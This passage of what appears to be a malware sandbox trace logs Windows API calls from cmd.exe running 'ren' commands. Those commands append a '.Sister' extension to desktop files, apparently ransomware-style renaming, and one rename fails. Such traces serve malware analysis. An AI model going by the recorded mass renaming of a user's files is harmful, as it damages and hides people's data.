returned 0x2 [0151.185] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.185] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0151.209] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.209] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x1e) returned 1 [0151.221] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0151.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.222] GetFileType (hFile=0x50) returned 0x2 [0151.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.222] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0151.251] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.251] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0151.273] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0151.286] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0151.286] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0151.286] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0151.286] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0151.286] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0151.286] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0151.286] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0151.286] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0151.286] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0151.286] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0151.286] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0151.287] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0151.287] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0151.287] ??_V@YAXPEAX@Z () returned 0x1 [0151.287] GetProcessHeap () returned 0x21ed8c70000 [0151.287] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x88) returned 0x21ed8d66520 [0151.287] GetProcessHeap () returned 0x21ed8c70000 [0151.287] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66520, Size=0x4c) returned 0x21ed8d66520 [0151.287] GetProcessHeap () returned 0x21ed8c70000 [0151.287] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66520) returned 0x4c [0151.287] GetProcessHeap () returned 0x21ed8c70000 [0151.287] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x54) returned 0x21ed8d434b0 [0151.287] GetProcessHeap () returned 0x21ed8c70000 [0151.287] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x88) returned 0x21ed8d66580 [0151.287] GetProcessHeap () returned 0x21ed8c70000 [0151.287] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66580, Size=0x4c) returned 0x21ed8d66580 [0151.287] GetProcessHeap () returned 0x21ed8c70000 [0151.287] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66580) returned 0x4c [0151.288] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0151.288] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0151.288] GetProcessHeap () returned 0x21ed8c70000 [0151.288] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43030 [0151.288] GetProcessHeap () returned 0x21ed8c70000 [0151.288] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372980 [0151.288] _wcsicmp (_String1="JyNR.mp3", _String2=".") returned 60 [0151.288] _wcsicmp (_String1="JyNR.mp3", _String2="..") returned 60 [0151.288] GetFileAttributesW (lpFileName="JyNR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\jynr.mp3")) returned 0x20 [0151.288] GetProcessHeap () returned 0x21ed8c70000 [0151.288] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93f0730 [0151.290] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93f0740 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0151.290] SetErrorMode (uMode=0x0) returned 0x0 [0151.290] SetErrorMode (uMode=0x1) returned 0x0 [0151.290] GetFullPathNameW (in: lpFileName="JyNR.mp3", nBufferLength=0x7fe7, lpBuffer=0x21ed91dfdc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\JyNR.mp3", lpFilePart=0xa6cf4fd660*="JyNR.mp3") returned 0x20 [0151.290] SetErrorMode (uMode=0x0) returned 0x1 [0151.290] GetProcessHeap () returned 0x21ed8c70000 [0151.290] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372e60 [0151.291] _wcsicmp (_String1="JyNR.mp3", _String2=".") returned 60 [0151.291] _wcsicmp (_String1="JyNR.mp3", _String2="..") returned 60 [0151.291] GetFileAttributesW (lpFileName="JyNR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\jynr.mp3")) returned 0x20 [0151.291] ??_V@YAXPEAX@Z () returned 0x1 [0151.291] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0151.291] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0151.291] malloc (_Size=0xffce) returned 0x21ed91efda0 [0151.291] ??_V@YAXPEAX@Z () returned 0x21ed91efda0 [0151.291] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JyNR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\jynr.mp3")) returned 0x20 [0151.291] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0151.291] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0151.292] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JyNR.mp3", fInfoLevelId=0x1, lpFindFileData=0x21ed9372990, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9372990) returned 0x21ed8d439f0 [0151.292] malloc (_Size=0xffce) returned 0x21ed920fd60 [0151.292] ??_V@YAXPEAX@Z () returned 0x21ed920fd60 [0151.293] ??_V@YAXPEAX@Z () returned 0x1 [0151.293] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\JyNR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\jynr.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\JyNR.mp3.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\jynr.mp3.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0151.294] FindNextFileW (in: hFindFile=0x21ed8d439f0, lpFindFileData=0x21ed9372990 | out: lpFindFileData=0x21ed9372990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41f92750, ftCreationTime.dwHighDateTime=0x1d5eb7b, ftLastAccessTime.dwLowDateTime=0xd2a616e0, ftLastAccessTime.dwHighDateTime=0x1d5ea6e, ftLastWriteTime.dwLowDateTime=0xd2a616e0, ftLastWriteTime.dwHighDateTime=0x1d5ea6e, nFileSizeHigh=0x0, nFileSizeLow=0x14f69, dwReserved0=0x0, dwReserved1=0x0, cFileName="JyNR.mp3", cAlternateFileName="")) returned 0 [0151.296] GetLastError () returned 0x12 [0151.296] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0151.296] ??_V@YAXPEAX@Z () returned 0x1 [0151.296] ??_V@YAXPEAX@Z () returned 0x1 [0151.298] ??_V@YAXPEAX@Z () returned 0x1 [0151.299] ??_V@YAXPEAX@Z () returned 0x1 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d439f0 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95640, Size=0x16) returned 0x21ed8c95540 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95540) returned 0x16 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d67e70 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d67e70, Size=0xb2) returned 0x21ed8d67e70 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.299] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67e70) returned 0xb2 [0151.299] GetProcessHeap () returned 0x21ed8c70000 [0151.300] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377a20 [0151.300] GetProcessHeap () returned 0x21ed8c70000 [0151.300] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377a20, Size=0x30) returned 0x21ed9377a20 [0151.300] GetProcessHeap () returned 0x21ed8c70000 [0151.300] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377a20) returned 0x30 [0151.300] GetProcessHeap () returned 0x21ed8c70000 [0151.300] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377a60 [0151.300] malloc (_Size=0x1ff9c) returned 0x21ed91dfdc0 [0151.302] GetProcessHeap () returned 0x21ed8c70000 [0151.302] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47ed0 [0151.302] GetProcessHeap () returned 0x21ed8c70000 [0151.302] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d47bd0 [0151.302] ??_V@YAXPEAX@Z () returned 0x1 [0151.302] malloc (_Size=0x1ff9c) returned 0x21ed91dfdc0 [0151.302] GetProcessHeap () returned 0x21ed8c70000 [0151.302] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47d50 [0151.303] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed91dfdc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0151.303] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d665a0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43a50 [0151.303] FindClose (in: hFindFile=0x21ed8d43a50 | out: hFindFile=0x21ed8d43a50) returned 1 [0151.303] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d665a0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42d90 [0151.303] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0151.303] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x84c96db6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x84c96db6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d665a0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d42f10 [0151.304] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0151.304] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x84c96db6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x84c96db6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d665a0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0151.304] malloc (_Size=0x1ff9c) returned 0x21ed91ffd70 [0151.304] ??_V@YAXPEAX@Z () returned 0x21ed91ffd70 [0151.307] GetProcessHeap () returned 0x21ed8c70000 [0151.307] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d671b0 [0151.307] ??_V@YAXPEAX@Z () returned 0x1 [0151.307] ??_V@YAXPEAX@Z () returned 0x1 [0151.307] GetProcessHeap () returned 0x21ed8c70000 [0151.307] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377a60, Size=0x490) returned 0x21ed9377a60 [0151.307] GetProcessHeap () returned 0x21ed8c70000 [0151.307] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377a60) returned 0x490 [0151.307] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0151.307] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.307] GetFileType (hFile=0x50) returned 0x2 [0151.307] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.307] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0151.332] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0151.332] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0151.332] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0151.332] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.332] GetFileType (hFile=0x50) returned 0x2 [0151.332] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.332] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0151.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.350] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0151.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.368] GetFileType (hFile=0x50) returned 0x2 [0151.368] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.368] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0151.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.525] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9377a30*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9377a30*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0151.577] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0151.577] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.577] GetFileType (hFile=0x50) returned 0x2 [0151.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.578] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0151.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.630] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0151.649] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0151.649] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.649] GetFileType (hFile=0x50) returned 0x2 [0151.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.649] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0151.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.662] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0151.670] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0151.673] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0151.673] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0151.673] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0151.673] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0151.673] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0151.673] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0151.673] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0151.673] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0151.673] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0151.673] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0151.674] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0151.674] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0151.674] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0151.674] ??_V@YAXPEAX@Z () returned 0x1 [0151.674] GetProcessHeap () returned 0x21ed8c70000 [0151.674] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d66af0 [0151.674] GetProcessHeap () returned 0x21ed8c70000 [0151.674] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66af0, Size=0x130) returned 0x21ed8d66af0 [0151.674] GetProcessHeap () returned 0x21ed8c70000 [0151.674] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66af0) returned 0x130 [0151.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0151.674] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0151.675] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0151.675] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0151.675] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed91dfdc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0151.676] ??_V@YAXPEAX@Z () returned 0x1 [0151.676] GetProcessHeap () returned 0x21ed8c70000 [0151.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d621d0 [0151.676] GetProcessHeap () returned 0x21ed8c70000 [0151.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d63840 [0151.676] GetProcessHeap () returned 0x21ed8c70000 [0151.676] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63840, Size=0x130) returned 0x21ed8d63840 [0151.677] GetProcessHeap () returned 0x21ed8c70000 [0151.677] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63840) returned 0x130 [0151.677] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0151.677] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0151.677] GetProcessHeap () returned 0x21ed8c70000 [0151.677] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42fd0 [0151.677] GetProcessHeap () returned 0x21ed8c70000 [0151.677] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9375080 [0151.677] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0151.677] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0151.677] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0151.677] GetLastError () returned 0x2 [0151.677] GetProcessHeap () returned 0x21ed8c70000 [0151.677] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9400720 [0151.677] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9400730 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0151.677] SetErrorMode (uMode=0x0) returned 0x0 [0151.677] SetErrorMode (uMode=0x1) returned 0x0 [0151.677] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed91dfdc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0151.677] SetErrorMode (uMode=0x0) returned 0x1 [0151.677] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0151.678] GetProcessHeap () returned 0x21ed8c70000 [0151.678] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373340 [0151.678] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0151.678] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0151.678] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0151.678] GetLastError () returned 0x2 [0151.678] ??_V@YAXPEAX@Z () returned 0x1 [0151.678] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0151.678] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0151.678] malloc (_Size=0xffce) returned 0x21ed91efda0 [0151.678] ??_V@YAXPEAX@Z () returned 0x21ed91efda0 [0151.678] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0151.678] GetLastError () returned 0x2 [0151.678] _get_osfhandle (_FileHandle=2) returned 0x54 [0151.678] GetFileType (hFile=0x54) returned 0x2 [0151.678] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0151.678] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0151.681] _get_osfhandle (_FileHandle=2) returned 0x54 [0151.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0151.706] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0151.706] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0151.706] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0151.762] longjmp () [0151.762] 